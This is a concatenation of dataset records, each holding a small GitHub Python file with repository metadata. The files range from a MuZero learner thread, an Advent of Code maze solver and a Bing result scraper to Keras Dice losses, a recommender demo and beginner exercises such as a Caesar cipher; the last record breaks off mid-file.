'__main__':\n a=Solution().lengthOfLongestSubstring(\"tmmzuxt\")\n print(a)","repo_name":"fengben/ShuaLeetCode","sub_path":"3/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197192489","text":"\"\"\"\nCode from https://github.com/ray-project/ray/blob/ray-0.8.7/rllib/agents/dqn/learner_thread.py\nand https://github.com/ray-project/ray/blob/ray-0.8.7/rllib/utils/window_stat.py\n\"\"\"\nfrom __future__ import annotations\n\nimport queue\nimport threading\n\nfrom ray.util.timer import _Timer as TimerStat\n\nfrom muzero.metrics import get_learner_stats\nfrom muzero.policy import LEARNER_STATS_KEY\nfrom muzero.sample_batch import DEFAULT_POLICY_ID\n\nLEARNER_QUEUE_MAX_SIZE = 8\n\n\nimport numpy as np\n\n\nclass WindowStat:\n def __init__(self, name, n):\n self.name = name\n self.items = [None] * n\n self.idx = 0\n self.count = 0\n\n def push(self, obj):\n self.items[self.idx] = obj\n self.idx += 1\n self.count += 1\n self.idx %= len(self.items)\n\n def stats(self):\n if not self.count:\n _quantiles = []\n else:\n _quantiles = np.nanpercentile(self.items[:self.count],\n [0, 10, 50, 90, 100]).tolist()\n return {\n self.name + \"_count\": int(self.count),\n self.name + \"_mean\": float(np.nanmean(self.items[:self.count])),\n self.name + \"_std\": float(np.nanstd(self.items[:self.count])),\n self.name + \"_quantiles\": _quantiles,\n }\n\n\nclass LearnerThread(threading.Thread):\n \"\"\"Background thread that updates the local model from replay data.\n The learner thread communicates with the main thread through Queues. This\n is needed since Ray operations can only be run on the main thread. In\n addition, moving heavyweight gradient ops session runs off the main thread\n improves overall throughput.\n \"\"\"\n\n def __init__(self, local_worker):\n threading.Thread.__init__(self)\n self.learner_queue_size = WindowStat(\"size\", 50)\n self.local_worker = local_worker\n self.inqueue = queue.Queue(maxsize=local_worker.config['learner_queue_size'])\n self.outqueue = queue.Queue()\n self.queue_timer = TimerStat()\n self.grad_timer = TimerStat()\n self.overall_timer = TimerStat()\n self.daemon = True\n self.weights_updated = False\n self.stopped = False\n self.stats = {}\n\n def run(self):\n while not self.stopped:\n self.step()\n\n def step(self):\n with self.overall_timer:\n with self.queue_timer:\n ra, batch = self.inqueue.get()\n if batch is not None:\n prio_dict = {}\n with self.grad_timer:\n info = self.local_worker.learn_on_batch(batch)\n pid = DEFAULT_POLICY_ID\n p = info.get(\n \"replay_p\",\n info[LEARNER_STATS_KEY].get(\"replay_p\"))\n prio_dict[pid] = (batch.data.get(\"batch_indexes\"), p)\n self.stats[pid] = get_learner_stats(info)\n self.grad_timer.push_units_processed(batch.count)\n self.outqueue.put((ra, prio_dict, batch.count))\n self.learner_queue_size.push(self.inqueue.qsize())\n self.weights_updated = True\n self.overall_timer.push_units_processed(batch and batch.count\n or 0)","repo_name":"expz/muzero-ray","sub_path":"muzero/learner_thread.py","file_name":"learner_thread.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31189354273","text":"l,d=input().split( )\nx=int(l)\ny=int(d)\nfor num in range(x,y):\n\tpower=len(str(num))\n\tsum=0\n\ttemp=num\n\twhile temp>0:\n\t\tdigit=temp%10\n\t\tsum=sum+digit**power\n\t\ttemp//=10\n\tif num==sum:\n\t\tprint(num)\n","repo_name":"Dhamodhiran/dhamu","sub_path":"case18.py","file_name":"case18.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3699918741","text":"from . import views\n\nfrom django.urls import path\n\nurlpatterns = [\n path(\"\", views.index, name=\"friendship_index\"),\n path(\"show_friends\", views.show_friends, name=\"show_friends\"),\n path(\"add_friend\", views.add_friend, name=\"add_friend\"),\n path(\"show_requests\", views.show_requests, name=\"show_requests\"),\n path(\"check_status\", views.check_status, name=\"check_status\"),\n\n path(\"accept\", views.accept, name=\"accept\"),\n path(\"reject\", views.reject, name=\"reject\"),\n path(\"withdraw\", views.withdraw, name=\"withdraw\"),\n\n path(\"delete_friend\", views.delete_friend, name=\"delete_friend\"),\n path(\"send_message\", views.send_message, name=\"send_message\")\n]","repo_name":"NikiTesla/vk_test","sub_path":"friendship/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70732497767","text":"#!/usr/bin/env python3\n\nfrom collections import Counter, defaultdict\nimport string\nimport sys\n\nwith open(\"day18_i.txt\", \"r\") as f:\n map_ = [[c for c in l if c != '\\n'] for l in f.readlines()]\n\nclass Area:\n def __init__(self, map_, xs=None, ys=None):\n self.map = map_\n\n self.width = len(map_[0])\n self.height = len(map_)\n if xs is None:\n self.xstart = 0\n self.xend = self.width\n else:\n self.xstart = xs[0]\n self.xend = xs[1]\n\n if ys is None:\n self.ystart = 0\n self.yend = self.height\n else:\n self.ystart = ys[0]\n self.yend = ys[1]\n\n def show(self, pos=None):\n sys.stderr.write(\"AREA MAP\\n\\n\")\n for y in range(self.ystart, self.yend):\n for x in range(self.xstart, self.xend):\n obj = self.map[y][x]\n if pos is not None and pos[0] == x and pos[1] == y:\n sys.stderr.write(\"=\")\n else:\n sys.stderr.write(obj)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n\n def foreach(self, find_func):\n for y in range(self.ystart, self.yend):\n for x in range(self.xstart, self.xend):\n find_func(x, y, self.map[y][x])\n\n def get(self, pos):\n return self.map[pos[1]][pos[0]]\n\n def set(self, pos, tile):\n self.map[pos[1]][pos[0]] = tile\n\n def is_key(self, pos):\n return self.get(pos) in string.ascii_lowercase\n\n def is_door(self, pos):\n return self.get(pos) in string.ascii_uppercase\n\n def in_area(self, pos):\n return (pos[0] >= self.xstart and pos[0] < self.xend\n and pos[1] >= self.ystart and pos[1] < self.yend)\n\n def vicinity(self, pos):\n candidates = [\n (pos[0] + 1, pos[1]),\n (pos[0] - 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0], pos[1] - 1)\n ]\n return [p for p in candidates\n if self.in_area(p)]\n\ndef find_obj(area, target):\n found = []\n def _find_obj(x, y, obj):\n if obj == target:\n found.append((x,y))\n area.foreach(_find_obj)\n return found\n\ndef find_keys(area):\n found = set()\n def _find_obj(x, y, obj):\n if obj in string.ascii_lowercase:\n found.add(obj)\n area.foreach(_find_obj)\n return found\n\ndef walkable(tile, keys, doors=string.ascii_uppercase):\n if tile == \"#\":\n return False\n elif tile in string.ascii_lowercase:\n return True\n elif tile.lower() in keys:\n return True\n elif tile in doors:\n return False\n elif tile == \".\":\n return True\n elif tile == \"@\":\n return True\n else:\n return True\n #assert False\n\ndef add_key(tile, keys):\n if tile in string.ascii_lowercase:\n return frozenset(keys | {tile})\n else:\n return keys\n\n#visited = defaultdict(list)\n#\n# This class registers interesting paths to all maze points\n#class BestPaths:\n# def __init__(self):\n# self.visited = defaultdict(list)\n#\n# def new_path(self, pos, length, keys):\n# useless = False\n# new_paths = []\n#\n# # Find similar paths reaching this point\n# # In the process we remove any previous path that's not interesting\n# # anymore\n# for best_length, with_keys in self.visited[pos]:\n# if keys <= with_keys:\n# useless = True\n#\n# if with_keys <= keys and best_length + 1 >= length:\n# continue\n# new_path.append((best_length, with_keys))\n#\n# if not useless:\n# new_paths.append((length, keys))\n# self.visited[pos] = new_paths\n# return True\n# else:\n# return False\n\nclass MazeBot:\n def __init__(self, area, start_pos):\n self.area = area\n\n self.all_keys = find_keys(self.area)\n self.all_doors = set([c.upper() for c in list(self.all_keys)])\n self.visited = defaultdict(list)\n self.distance = 0\n self.cur_points = [(frozenset(), 0, start_pos)]\n self.max_keys = 0\n self.done = False\n self.static_points = set()\n\n def state(self):\n if self.done:\n return [(self.all_keys, self.distance)]\n else:\n return [(keys, dst) for (keys, dst, _) in list(self.static_points) if dst != 0]\n\n def inject(self, state):\n if self.done:\n return 0\n\n for keys, dst, pos in list(self.static_points):\n for (ext_keys, ext_dst) in state:\n self.cur_points.append((keys | ext_keys, dst + ext_dst, pos)) \n\n def filter_useless(self, points):\n actual_points = []\n for new_point in points:\n if new_point[0] >= self.all_keys:\n self.distance = new_point[1]\n sys.stderr.write(\"Collected all keys {} / took {} steps\\n\"\n .format(self.all_keys, new_point[1]))\n self.done = True\n return 1\n if len(new_point[0]) > self.max_keys:\n self.max_keys = len(new_point[0])\n #sys.stderr.write(\"Got {} keys {}\\n\".format(self.max_keys, new_point[0]))\n sys.stderr.write(\"Including {}\\n\".format(self.all_keys & new_point[0]))\n print(\"Path heads {}\".format(len(points)))\n\n useless = False\n new_keys = set()\n for keys in self.visited[new_point[2]]:\n if new_point[0] <= keys:\n useless = True\n\n if keys <= new_point[0]:\n continue\n new_keys |= {keys}\n\n if not useless:\n new_keys |= {new_point[0]}\n self.visited[new_point[2]] = new_keys\n actual_points.append(new_point)\n return actual_points\n\n def progress(self):\n if self.done:\n return 1\n\n next_points = []\n for keys, dst, pos in self.cur_points:\n next_points += [(add_key(self.area.get(p), keys), dst + 1, p)\n for p in self.area.vicinity(pos)\n #if ((keys, p) not in visited.keys()\n if walkable(self.area.get(p), keys,\n doors=self.all_doors)]\n\n nearby_doors = set()\n # Keep points of interest available. When we see a wall, just wait\n # there in case another bot unlocks it for us\n for keys, dst, pos in self.cur_points:\n doors = [self.area.get(p)\n for p in self.area.vicinity(pos)\n if self.area.is_door(p)]\n if doors != []:\n nearby_doors |= set(doors)\n self.static_points |= {(frozenset(self.all_keys & keys), dst, pos)}\n\n actual_points = self.filter_useless(next_points)\n if actual_points == []:\n print(\"out of options, nearby doors: {}\".format(nearby_doors))\n return -1\n\n self.cur_points = actual_points\n\n return 0\n\n\narea = Area(map_)\nstart_pos = find_obj(area, \"@\")[0]\n\narea.show()\n\n# Fix center of maze for p2\nfor pos in area.vicinity(start_pos):\n area.set(pos, \"#\")\narea.set(start_pos, \"#\")\nsub_areas = []\nfor i, j in [(a, b) for a in [1, -1] for b in [1, -1]]:\n area.set((start_pos[0] + i, start_pos[1] + j), \"@\")\n\n if i == -1:\n xs = (0, start_pos[0] + 1)\n else:\n xs = (start_pos[0], area.width)\n if j == -1:\n ys = (0, start_pos[1] + 1)\n else:\n ys = (start_pos[1], area.height)\n\n sub_area = Area(area.map, xs, ys)\n\n sub_areas.append(((start_pos[0] + i, start_pos[1] + j), sub_area))\n sub_area.show()\n\n#start_pos = find_obj(area, \"@\")\n#area.show()\nprint(start_pos)\n\n# Instantiate vault bots\nbots = [MazeBot(area, pos) for pos, area in sub_areas]\n\nfor bot in bots:\n sys.stderr.write(\"Keys {}\\n\".format(bot.all_keys))\n\nfor i, bot in enumerate(bots):\n print(\"Advance bot {}\".format(i))\n while bot.progress() == 0:\n pass\n\nfor it in range(0,10):\n for i, bot in enumerate(bots):\n inject_state = [to_inject\n for other_bot in bots\n for to_inject in other_bot.state()\n if other_bot != bot]\n\n print(\"Advance bot {}\".format(i))\n print(\"Inject other bots state {}\".format(len(inject_state)))\n #print(inject_state)\n\n bot.inject(inject_state)\n while bot.progress() == 0:\n pass\n\n print(\"Bot {} state {}\".format(i, len(bot.state())))\n\n all_done = True \n for bot in bots:\n if not bot.done:\n all_done = False\n\n if all_done:\n print(\"Collected all keys accross bots\")\n sys.exit(0)\n\n #print(bot.state())\n\n#bot = MazeBot(area, start_pos)\n#while bot.progress() == 0:\n# pass\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day18/day18_2.py","file_name":"day18_2.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13594957355","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport lxml\r\nimport csv\r\nimport pandas as pd\r\n\r\nheaders = {\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582\"\r\n}\r\n\r\nkeywords = pd.read_csv('D:\\\\xampp\\\\htdocs\\\\Python\\\\Test\\\\duck\\\\input.csv', header=0, index_col=None)\r\n\r\ndf = pd.DataFrame(columns=['keyword', 'url'])\r\n\r\nfor keyword in keywords['keywords']:\r\n print(keyword)\r\n response = requests.get(\"https://www.bing.com/search?form=QBRE&q=\" + keyword, headers=headers).text\r\n soup = BeautifulSoup(response, 'lxml')\r\n for j in soup.select('.b_algo h2 a', limit=1):\r\n link = j['href']\r\n print(link)\r\n df = df.append({'keyword': keyword, 'url': link}, ignore_index=True) \r\n\r\ndf.to_csv(r'D:\\\\xampp\\\\htdocs\\\\Python\\\\Test\\\\duck\\\\final_dataset.csv', index=False)\r\n\r\ninput(\" press close to exit \")","repo_name":"susheelseth/Bing-search-scraping-data-from-multiple-queries-from-a-csv-file","sub_path":"bing.py","file_name":"bing.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30449184692","text":"\"\"\"\nSorted\n\nOBS: Não confunda, apesar do nome, com a função sort() que já estudamos em Listas. \no sort() so funciona em listas.\n\nPodemos utilizar o sorted() com qualquer iterável\n\nComo o próprio nome diz. sorted() serve para ordenar.\n\"\"\"\n\ntupla = 7, 2, 3\n\n# print(tupla.sort()) # erro de atributo\n\nprint(sorted(tupla)) # sorted retorna uma nova lista a original se matém intacta...\nprint(tupla)\n\n# Adicionando parâmetros ao sorted()\nnumeros = [1, 4, 5, 7, 2, 3]\n\nprint(sorted(numeros, reverse=True))# Ordena do maior para o menor\n\n# Podemos utilizar o sorted() para coisas mais complexas\n\n\nusuarios = [\n {\"username\": \"Samuel\", \"tweets\": [\"Eu adoro bolos\", \"Eu adoro pizzas\"]},\n {\"username\": \"Bob\", \"tweets\": [\"So jogo video-game\", \"Dormo 3 horas por dia\"]},\n {\"username\": \"Carla\", \"tweets\": [\"Odeio meus irmãos\"], \"cor\": \"Amarelo\"},\n {\"username\": \"Rafaela\", \"tweets\": [\"Passei em primeiro no Enem\", \"Bio-Ciência\"]},\n {\"username\": \"Fernando\", \"tweets\": []},\n {\"username\": \"Liniker\", \"tweets\": [\"One piece é vida\"], \"cor\": \"perto\", \"musica\": \"Rock\"}\n\n]\n\n# Ordenar pelo tamanho do dicionario\nprint(usuarios)\nprint(sorted(usuarios, key=lambda usuario : usuario['username'], reverse=True))\n\n# Ordenando por número de tweets\nprint(\" POR TWEETS \\n\")\nprint(sorted(usuarios, key=lambda usuario : len(usuario['tweets'])))\n\n\n# Último exemplo\n\nmusicas = [\n {'titulo': \"Thunderstruck\", \"tocou\": 3},\n {'titulo': \"Nothing else matters\", \"tocou\": 6},\n {'titulo': \"Insdestructible\", \"tocou\": 1},\n {'titulo': \"November Rain\", \"tocou\": 2},\n]\n\n# Ordena da menos tocada para a mais tocada\nprint(sorted(musicas, key=lambda musica: musica['tocou']))\n\nprint(sorted(musicas, key=lambda musica: musica['tocou'], reverse=True))","repo_name":"linikerunk/python-as-well","sub_path":"geek-universe/sorted.py","file_name":"sorted.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15001730508","text":"# Refund Cost Calculator by Jason Rousell\r\n# 9/9/2022\r\n# In wake of professor strike, this small tool calculates how much money\r\n# you have wasted, or that the university has wasted, while you\r\n# weren't able to attend class.\r\n\r\n# This tool doesn't account for online fees, other course fees, or material costs. Add those if you want\r\n\r\ntotalCredit = int(input(\"Type the total amount of credit hours that you are taking.\\n\\n\"))\r\nclassCredit = int(input(\"Type the amount of credit hours for this class. Most classes are worth three credit hours, \"\r\n \"but some are worth more.\\n\\n\"))\r\nclassDays = int(input(\"Type how many days a week you have this class. EX: If you have this class on Monday and \"\r\n \"Wednesday, type 2.\\n\\n\")) * 14\r\n\r\n# This project assumes that total class days in a semester = 14 days for each weekday (14 Mondays, 14 Tuesdays, etc.)\r\n\r\ndaysMissed = int(input(\"Type how many days of this class you have missed. Do not count holidays or other similar \"\r\n \"break days.\\n\\n\"))\r\ngradUndergrad = int(input(\"If the class is counted in UNDERGRADUATE credits (level 100-499), type 1. \\nIf the class is \"\r\n \"counted in GRADUATE credits, AND the class is course level 500-699, type 2. \\nIf the class \"\r\n \"is counted in GRADUATE credits, AND the class is course level 700+, type 3.\\n\\n\"))\r\nresidentNon = int(input(\"Are you a resident of Michigan? Type 1 or 2 for \\\"yes\\\" or \\\"no\\\".\\n\\n\"))\r\n\r\n# Residents vs. Non-Residents have different rates at the Graduate level only\r\n\r\nif gradUndergrad == 1:\r\n if totalCredit < 12:\r\n creditCost = (608 * classCredit)\r\n if 12 <= totalCredit <= 16:\r\n creditCost = 7250\r\n if totalCredit >= 17:\r\n creditCost = 7250 + (608 * (totalCredit - 16))\r\n\r\nif gradUndergrad == 2:\r\n if residentNon == 1:\r\n creditCost = (938.50 * classCredit)\r\n if residentNon == 2:\r\n creditCost = (1626.50 * classCredit)\r\n\r\nif gradUndergrad == 1:\r\n if residentNon == 1:\r\n creditCost = (1074.00 * classCredit)\r\n if residentNon == 2:\r\n creditCost = (1834.00 * classCredit)\r\n\r\ndailyCost = creditCost / classDays\r\n\r\nrefundNeeded = round(dailyCost * daysMissed, 2)\r\n\r\nprint(\"Here's the math: you deserve a refund of\", refundNeeded,\"for the classes you've missed.\")","repo_name":"psyhost22/EMURefundCalculator","sub_path":"refund.py","file_name":"refund.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27946357585","text":"with open(\"fifa.txt\", 'r', encoding='latin2') as f:\r\n lista = list()\r\n fejlec = f.readline()\r\n for sor in f:\r\n lista.append(sor.strip().split(\";\"))\r\n \r\n#3. feladat\r\nprint(f'3. feladat: A világranglistán {len(lista)} csapat szerepel')\r\n\r\n#4. feladat\r\n\r\nöp = sum( [int(sor[3]) for sor in lista] )\r\növ = len(lista)\r\n\r\nátlag = öp/öv\r\n\r\nprint(f'4. feladat: A csapatokátlagos pontszáma: {átlag} pont')\r\n\r\n#5. feladat\r\nvaltozas0 = 0\r\nhelyezes0 = 0\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n if int(valtozas) > valtozas0:\r\n valtozas0 = int(valtozas)\r\n #if int(valtozas) > valtozas0:\r\n pontszam0 = pontszam\r\n csapat0 = csapat\r\n helyezes0 = helyezes\r\n\r\nprint(f'5. feladat: A legtöbbbet javító csapat:')\r\nprint(f' Helyezés: {helyezes0} ')\r\nprint(f' Csapat: {csapat0} ')\r\nprint(f' Pontszám: {pontszam0} ')\r\n\r\n#6. feladat\r\nszamlalo = 0\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n if csapat == 'Magyarország':\r\n szamlalo += 1\r\nif szamlalo > 0:\r\n print(f'6. feladat: A csapatok között van Magyarország')\r\nif szamlalo == 0:\r\n print(f'6. feladat: A csapatok között nincs Magyarország')\r\n\r\n#7. feladat\r\nimport collections\r\n\r\ngyujto = collections.Counter()\r\n\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n gyujto[valtozas] += 1\r\nprint(f'7. feladat: Statisztika')\r\nfor valtozas, darab in gyujto.items():\r\n if darab > 1:\r\n print(f' {valtozas} helyet véltozott: {darab} csapat')","repo_name":"Tamas9c/OkjFIFA","sub_path":"FIFAvilagranglista.py","file_name":"FIFAvilagranglista.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38532069797","text":"import CoronaTracker\nimport sqlite3\nimport csv\n\ndef run():\n \"\"\"Main execution method for the module. Will take the information stored in the database to appropriately\n analyze the sequences and find their closest relative via FOGSAA.\n NOTE: GenerateSQL.py must be run prior to this module.\"\"\"\n\n conn = sqlite3.connect('Sequences.db')\n curs_main = conn.cursor()\n curs_supp = conn.cursor()\n sql_index = 2\n spreads = []\n\n \"\"\"This section will loop through every sequence available in the details table, retrieve its sequence\n as well as the sequences of any samples which have come in the prior 40 days (days can be adjusted)\n and then compare them to find the primary sample's best match, storing the two as a spread in a list.\"\"\"\n\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n #Only retrieve information on sequences which have a date and sequence available.\n while current_row and current_row[2]:\n curs_main.execute('''SELECT genome FROM nucleotides WHERE id=?;''', [current_row[0]])\n current_genome = curs_main.fetchone()\n if not current_genome:\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n continue\n oldest_time = CoronaTracker.ComparisonUtility.getStopDate(current_row[2], days=40)\n curs_main.execute('''SELECT id, location FROM details WHERE date < ? AND date > ?;''',\n [current_row[2], oldest_time])\n current_best = [None, -100000]\n for row in curs_main.fetchall():\n curs_supp.execute('''SELECT genome FROM nucleotides WHERE id=?;''', [current_row[0]])\n compared_genome = curs_supp.fetchone()[0]\n if not compared_genome:\n continue\n likeness_score = CoronaTracker.ComparisonUtility.compareSequences(current_genome, compared_genome)\n if likeness_score > current_best[1]:\n current_best = [row[0], likeness_score]\n main_sequence = CoronaTracker.Sequence(current_row[0], current_row[1])\n curs_supp.execute('''SELECT * FROM details WHERE id=?;''', [current_best[0]])\n ancestor = curs_supp.fetchone()\n if not ancestor:\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n continue\n ancestor_sequence = CoronaTracker.Sequence(ancestor[0], ancestor[1])\n spreads.append(CoronaTracker.Spread(start_seq=ancestor_sequence, end_seq=main_sequence))\n\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n print('Analyzing row:\\n' + str(current_row))\n\n curs_supp.close()\n\n #Once all samples have been analyzed, stores the list of spreads in the spreads table.\n for spread in spreads:\n print('Inserting spread into DB:' + str(spread))\n curs_main.execute('''INSERT INTO spreads VALUES (?, ?, ?, ?, ?);''',\n [spread.start_id, spread.end_id, spread.start_loc, spread.end_loc, spread.strength])\n conn.commit()\n conn.close()\n\nif __name__ == \"__main__\":\n run()","repo_name":"WhiteWalz/CoronaTracker","sub_path":"Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71722818409","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras import backend as K\n\n\n# In[2]:\n\n\n\nsmooth = 1.\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\ndef dice_coef_2(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(K.square(y_true_f)) + K.sum(K.square(y_pred_f)) + smooth)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return 1 - dice_coef(y_true, y_pred)\n\ndef dice_coef_loss_2(y_true, y_pred):\n return 1 - dice_coef_2(y_true, y_pred)\n\nimport keras.losses\nkeras.losses.dice_coef_loss=dice_coef_loss\nkeras.losses.dice_coef_loss_2=dice_coef_loss_2\n\nimport keras.metrics\nkeras.metrics.dice_coef=dice_coef\nkeras.metrics.dice_coef_2=dice_coef_2\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"karinaaq/PINV15177","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20549322852","text":"from itertools import islice\n\nimport numpy as np\nimport pandas as pd\n\nfrom diyrex.algo import get_items_from_user\nfrom diyrex.data import load, stats\nfrom diyrex import ratings, preview\nfrom diyrex.matrix import table_to_sparse_matrix\n\nnp.random.seed(123)\n\n# %%\n\"\"\"\n## Load signals\n\"\"\"\nsignals = load('data/listenbrainz/parsed/data.csv', ['date','user','item'])\n\nprint(\"\\nsignals:\")\nstats(signals)\nsignals\n\n# %%\n\"\"\"\n## Convert to ratings\n\"\"\"\n\nratings = ratings.compute_implicit_ratings(signals)\nprint(\"\\nratings:\")\nstats(ratings)\nratings\n\n# %%\n\"\"\"\n## Convert to matrix\n\"\"\"\n\nR, users, items = table_to_sparse_matrix(ratings, 'user', 'item', 'rating')\nR\n\n# %%\n\n#do some checks\nuser, item, rating = ratings[ratings.item=='Metallica'].sample(1).iloc[0]\ni = users.index(user)\nj = items.index(item)\n\nassert items[j] == \"Metallica\"\n\nassert R[i,j] == np.float32(rating)\n\n# %%\n\"\"\"\n## Most popular\n\"\"\"\n\nfrom diyrex.algo.popular import most_highly_rated, most_popular\n\npreview((items.index(item) for item in most_highly_rated(ratings)), items, title=\"Top ratings for everyone\")\npreview((items.index(item) for item in most_popular(ratings)), items, title=\"Most popular\")\n\n\n# %%\n\"\"\"\n## Personalized recs\n\"\"\"\n\npreview(get_items_from_user(i, R), items, n=10, title=f\"Top rated items for '{users[i]}'\")\n\n\n# %%\n\"\"\"\n## User-user collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.collaborative import recommend_user_user_cf\n\npreview(recommend_user_user_cf(i, R), items, title=f\"User-User CF for '{users[i]}'\")\n\n\n# %%\n\"\"\"\n## Related items\n\"\"\"\nfrom diyrex.algo.collaborative import related\n\npreview(related(j, R), items, title=f\"Items related to '{items[j]}'\")\n\n\n\n# %%\n\"\"\"\n## Item-item collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.collaborative import recommend_item_item_cf\n\npreview(recommend_item_item_cf(i, R), items, title=f\"Item-Item CF for user '{users[i]}'\")\n\n\n\n# %%\n\"\"\"\n## Content based\n\"\"\"\n\ncontent = load('data/listenbrainz/parsed/content.csv', ['item','feature','value'])\n\n# item category codes must be the same so the matrices are aligned\ncontent['item'].cat.reorder_categories(items, inplace=True)\n\nassert all(content.item.cat.categories == signals.item.cat.categories)\n\nI,features, items2 = table_to_sparse_matrix(content, 'feature', 'item', 'value')\n\nassert items == items2\n\nfrom diyrex.algo.content import similar, recommend_content_based\n\npreview(similar(i,I),items,title=f\"Similar to item: {items[j]}\")\npreview(recommend_content_based(i,R, I),items,title=f\"Content-based recs for user: {users[i]}\")\n\n\n\n# %%\n\"\"\"\n## Efficient item-item collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.efficient import self_similarity_matrix, recommend_with_S\n\nS = self_similarity_matrix(R.T)\npreview(recommend_with_S(i, R, S), items, title=f\"Efficient Item-Item CF for user '{users[i]}'\")\n","repo_name":"jotinha/diy-rex","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"274693429","text":"def caesar_cipher(text, shift):\n result = \"\"\n for char in text:\n if char.isalpha():\n base = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - base + shift) % 26 + base)\n else:\n result += char\n return result\n\ndef count_fruit_occurrences(fruit_tuple, target_fruit):\n return fruit_tuple.count(target_fruit)\n\ndef count_partial_fruit_occurrences(fruit_tuple, partial_fruit):\n count = 0\n for fruit in fruit_tuple:\n count += fruit.count(partial_fruit)\n return count\n\ndef replace_manufacturer(car_tuple, old_manufacturer, new_word):\n return tuple([new_word if manuf == old_manufacturer else manuf for manuf in car_tuple])\n\n# 1\nshift = int(input(\"Введите сдвиг шифрования (целое число): \"))\ninput_text = input(\"Введите текст для шифрования: \")\nencrypted_text = caesar_cipher(input_text, shift)\nprint(\"Зашифрованный текст:\", encrypted_text)\n\n# 2\nfruits = ('apple', 'banana', 'mango', 'banana', 'strawberry-banana')\ntarget_fruit = input(\"Введите название фрукта для подсчета: \")\noccurrences = count_fruit_occurrences(fruits, target_fruit)\nprint(f\"Количество раз, когда {target_fruit} встречается в кортеже:\", occurrences)\n\n# 3\npartial_fruit = input(\"Введите часть названия фрукта для подсчета: \")\npartial_occurrences = count_partial_fruit_occurrences(fruits, partial_fruit)\nprint(f\"Количество раз, когда {partial_fruit} является частью элемента кортежа:\", partial_occurrences)\n\n# 4\nmanufacturers = ('Toyota', 'Ford', 'Chevrolet', 'Toyota', 'Honda', 'Toyota')\nold_manufacturer = input(\"Введите название производителя для замены: \")\nnew_word = input(\"Введите слово для замены: \")\nnew_manufacturers = replace_manufacturer(manufacturers, old_manufacturer, new_word)\nprint(\"Новый кортеж с замененными производителями:\", new_manufacturers)\n\n\n\n\ndef superset(set1, set2):\n if set1 == set2:\n print(\"Множества равны\")\n elif set1.issuperset(set2):\n print(f\"Объект {set1} является чистым супермножеством\")\n else:\n print(\"Супермножество не обнаружено\")\n\nset_a = {1, 2, 3, 4, 5}\nset_b = {3, 4}\n\nsuperset(set_a, set_b)\n\n\n\nclass EnglishFrenchDictionary:\n def __init__(self):\n self.dictionary = {}\n\n def add_word(self, english_word, french_translation):\n self.dictionary[english_word] = french_translation\n print(f'Слово \"{english_word}\" добавлено в словарь с переводом \"{french_translation}\".')\n\n def delete_word(self, english_word):\n if english_word in self.dictionary:\n del self.dictionary[english_word]\n print(f'Слово \"{english_word}\" удалено из словаря.')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def search_translation(self, english_word):\n if english_word in self.dictionary:\n 